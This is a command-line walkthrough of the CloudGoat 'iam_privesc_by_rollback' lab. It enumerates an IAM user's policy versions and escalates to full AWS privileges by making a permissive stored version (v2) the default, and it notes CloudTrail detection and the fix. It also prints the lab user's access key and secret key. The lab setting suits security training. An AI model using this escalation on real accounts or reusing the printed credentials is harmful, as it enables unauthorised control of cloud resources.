iam_privesc_by_rollback

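# Deploy the scenario; start.txt lists the lab user's access key pair, used below as the `raynor` CLI profile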
% ./cloudgoat.py create scenarios/iam_privesc_by_rollback
% cat /home/hnl/Desktop/ctf/cloud-goat/cloudgoat/iam_privesc_by_rollback_cgidki2woqscyc/start.txt
cloudgoat_output_aws_account_id = 287336331436
cloudgoat_output_policy_arn = arn:aws:iam::287336331436:policy/cg-raynor-policy-iam_privesc_by_rollback_cgidki2woqscyc
cloudgoat_output_raynor_access_key_id = AKIAUFZUUPCWP5AI5R54
cloudgoat_output_raynor_secret_key = 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
cloudgoat_output_username = raynor-iam_privesc_by_rollback_cgidki2woqscyc

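# Enumerate: who the user is, which managed policy is attached, and which versions of that policy are stored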
% aws iam get-user --profile raynor
{
    "User": {
        "Path": "/",
        "UserName": "raynor-iam_privesc_by_rollback_cgidki2woqscyc",
        "UserId": "AIDAUFZUUPCWOWCUNV2FJ",
        "Arn": "arn:aws:iam::287336331436:user/raynor-iam_privesc_by_rollback_cgidki2woqscyc",
        "CreateDate": "2021-09-10T05:44:36Z",
        "Tags": [
            {
                "Key": "Name",
                "Value": "cg-raynor-iam_privesc_by_rollback_cgidki2woqscyc"
            },
            {
                "Key": "Scenario",
                "Value": "iam-privesc-by-rollback"
            },
            {
                "Key": "Stack",
                "Value": "CloudGoat"
            }
        ]
    }
}

% aws iam list-attached-user-policies --user-name raynor-iam_privesc_by_rollback_cgidki2woqscyc --profile raynor
{
    "AttachedPolicies": [
        {
            "PolicyName": "cg-raynor-policy-iam_privesc_by_rollback_cgidki2woqscyc",
            "PolicyArn": "arn:aws:iam::287336331436:policy/cg-raynor-policy-iam_privesc_by_rollback_cgidki2woqscyc"
        }
    ]
}

% aws iam list-policy-versions --policy-arn arn:aws:iam::287336331436:policy/cg-raynor-policy-iam_privesc_by_rollback_cgidki2woqscyc --profile raynor
{
    "Versions": [
        {
            "VersionId": "v5",
            "IsDefaultVersion": false,
            "CreateDate": "2021-09-10T05:44:41Z"
        },
        {
            "VersionId": "v4",
            "IsDefaultVersion": false,
            "CreateDate": "2021-09-10T05:44:41Z"
        },
        {
            "VersionId": "v3",
            "IsDefaultVersion": false,
            "CreateDate": "2021-09-10T05:44:41Z"
        },
        {
            "VersionId": "v2",
            "IsDefaultVersion": false,
            "CreateDate": "2021-09-10T05:44:41Z"
        },
        {
            "VersionId": "v1",
            "IsDefaultVersion": true,
            "CreateDate": "2021-09-10T05:44:36Z"
        }
    ]
}

% aws iam get-policy-version --policy-arn arn:aws:iam::287336331436:policy/cg-raynor-policy-iam_privesc_by_rollback_cgidki2woqscyc --version-id v1 --profile raynor
{
    "PolicyVersion": {
        "Document": {
            "Version": "2012-10-17",
            "Statement": [
                {
                    "Sid": "IAMPrivilegeEscalationByRollback",
                    "Action": [
                        "iam:Get*",
                        "iam:List*",
                        "iam:SetDefaultPolicyVersion"
                    ],
                    "Effect": "Allow",
                    "Resource": "*"
                }
            ]
        },
        "VersionId": "v1",
        "IsDefaultVersion": true,
        "CreateDate": "2021-09-10T05:44:36Z"
    }
}


% aws iam get-policy-version --policy-arn arn:aws:iam::287336331436:policy/cg-raynor-policy-iam_privesc_by_rollback_cgidki2woqscyc --version-id v2 --profile raynor
{
    "PolicyVersion": {
        "Document": {
            "Version": "2012-10-17",
            "Statement": [
                {
                    "Action": "*",
                    "Effect": "Allow",
                    "Resource": "*"
                }
            ]
        },
        "VersionId": "v2",
        "IsDefaultVersion": false,
        "CreateDate": "2021-09-10T05:44:41Z"
    }
}

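# Change the default to v2. v1 grants iam:SetDefaultPolicyVersion on Resource "*", so raynor can make any stored version the default, and v2 allows Action "*" on Resource "*".
# The call is recorded in CloudTrail as a SetDefaultPolicyVersion event; deleting unused policy versions, or not granting iam:SetDefaultPolicyVersion, closes this path.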
% aws iam set-default-policy-version --policy-arn arn:aws:iam::287336331436:policy/cg-raynor-policy-iam_privesc_by_rollback_cgidki2woqscyc --version-id v2 --profile raynor

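# View the policy again (DefaultVersionId should now be v2), then create an S3 bucket to confirm the new permissions; v1 allowed only iam:Get*, iam:List* and iam:SetDefaultPolicyVersion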
% aws iam get-policy --policy-arn arn:aws:iam::287336331436:policy/cg-raynor-policy-iam_privesc_by_rollback_cgidki2woqscyc --profile raynor
% aws s3api create-bucket --bucket myspecialpriv --region us-east-1 --profile raynor
